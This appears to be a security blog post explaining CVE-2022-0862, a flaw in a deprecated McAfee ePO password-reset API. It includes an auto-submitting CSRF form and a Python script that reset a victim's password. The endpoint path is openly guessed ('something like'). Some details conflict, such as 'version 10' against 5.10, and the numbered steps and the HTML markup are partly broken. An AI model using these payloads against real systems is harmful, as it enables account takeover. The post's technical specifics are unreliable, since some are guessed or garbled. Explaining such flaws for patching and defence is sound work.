In early 2022, security researchers disclosed CVE-2022-0862, a vulnerability affecting McAfee Enterprise ePolicy Orchestrator (ePO)—specifically, versions before 5.10 Update 13. This post dives deep into what went wrong, how the exploit worked, and how the vulnerability could lead to account takeover under the right circumstances.
This vulnerability is both interesting and instructive because it involves an old, deprecated API—something administrators may think poses little risk. But as you’ll see, forgotten code can become a silent threat.
What Is McAfee ePO?
McAfee ePolicy Orchestrator (ePO) is one of the most popular centralized security management tools. Companies use it to manage security policies and monitor endpoints across large networks.
The Vulnerability Explained
CVE-2022-0862 is caused by missing password change protection in a specific, legacy API endpoint. Attackers could abuse this endpoint to change a user's password, even if they didn't know the current password—so long as the session was authenticated.
This API had been removed from the ePO user panel in version 10 but was still accessible in the application’s backend. It wasn’t until 5.10 Update 13 that McAfee fully disabled this API, preventing attackers from exploiting it.
Risk Scenario: Who Could Be Attacked?
- An attacker sends a password change request via the deprecated API, using a session belonging to a logged-in user.
- If the victim has clicked a malicious link or loaded a rogue webpage (CSRF attack), the attacker could change the victim’s ePO password.
- The attacker does not need to know the victim's old password—just access to an authenticated session.
Technical Breakdown (With Code!)
Let’s look at how this exploit works in practice.
The deprecated endpoint was something like
POST /core/api/user/resetpassword
The vulnerable function accepted the new password (and possibly the user ID), but didn't require the victim's old password.
2. Crafting the Exploit
An attacker would craft an HTTP POST request (for example, a CSRF payload embedded in a phishing page):
<form action="https://EPO_SERVER/core/api/user/resetpassword"; method="POST" id="attack">
<input type="hidden" name="userid" value="VictimUser">
<input type="hidden" name="password" value="NewPassword123!">
</form>
<script>
document.getElementById("attack").submit();
</script>
What happens here
- If the victim administrator is already logged in to ePO (has an active session cookie), and visits the attacker’s page, the new password is set without any warning.
Victim’s browser sends the request with the valid session cookie.
- The ePO backend resets the password for the user account, giving the attacker (if they know the new password) complete access.
4. Exploit in Python (For Testing in a Lab)
import requests
url = "https://EPO_SERVER/core/api/user/resetpassword";
session_cookie = {"JSESSIONID": "valid_session_id"}
data = {
"userid": "VictimUser",
"password": "NewPassword123!"
}
r = requests.post(url, data=data, cookies=session_cookie, verify=False)
print("Status Code:", r.status_code)
print("Response:", r.text)
> Warning: Only test this against a system *you own* or have permission to test.
Deprecated API endpoints are now completely disabled after version 5.10 Update 13.
- The vulnerable password reset functionality was removed from the user interface long ago (in version 10).
Links to Official References
- McAfee Security Bulletin (SB10392)
- NVD Description for CVE-2022-0862
Conclusion: The Lesson Learned
Old, forgotten APIs can become security holes, no matter how much a vendor modernizes their product. If legacy endpoints are left running, attackers could still knock on those doors—sometimes with devastating results.
Always patch to the latest version, audit your apps for deprecated code, and never underestimate the power of “what’s no longer visible”!
Stay safe. If you manage ePO or any other critical enterprise tools, check your patch level and ensure old features are really disabled—not just hidden.
Timeline
Published on: 03/23/2022 15:15:00 UTC
Last modified on: 03/29/2022 01:12:00 UTC